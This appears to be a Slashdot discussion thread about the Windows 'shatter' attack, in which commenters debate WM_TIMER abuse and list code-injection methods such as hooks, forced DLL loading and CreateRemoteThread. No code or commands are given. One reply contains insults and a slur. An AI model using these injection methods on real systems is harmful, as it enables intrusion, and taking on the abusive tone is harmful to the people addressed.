1. The WM_TIMER thing is slick, very cute. At least to my stupid and uneducated mind anyway *cough*
2. The whole exploiting a buffer overrun in an edit box of a non-Microsoft app just goes to show that you should be coding defensively EVERYWHERE, not just in network code.

wow, what a moron (0)

Anonymous Coward | more than 11 years ago | (#4020722)

if you want to secure windows from a client (who shouldn't be doing anything to exploit the system in the first place) then you just make it so they have restricted software access, not hard to do.., and btw, this bug won't let ppl take control of everything, just the things w/ an hwnd, and then not even access to vars and things, just drawing props...next retard please..

It's not even this hard (3, Insightful)

leshert (40509) | more than 11 years ago | (#4020731)

If you have physical access to the box, there are n ways to get your code executed in a Windows app. WM_TIMER (the callback version) is one, as are window hooking, CBT hooks (computer-based-training, although I've never seen it used for this purpose) forcible DLL loading (if you have access to the Registry), debug process attachment, CreateRemoteThread, thunking well-known DLLs (which is why Red Alert 1 won't play on Win2K without a patch--they can't thunk kernel32), etc., etc., etc.

Windows programmers have been using these methods for non-evil reasons for many years--the "3D look" of MS Office apps before Windows 95 was done this way.

The insecurity of the desktop model for Windows shouldn't surprise anyone. It wasn't designed to be secure OR multi-user, and patching after the fact doesn't make it so. It's comparable to complaining that telnet and ftp send passwords in clear text. Well, no kidding, they weren't designed to be secure, so they're not.

And like the case of telnet, making a secure but still 100% backwards compatible solution is pretty much impossible, as the article states.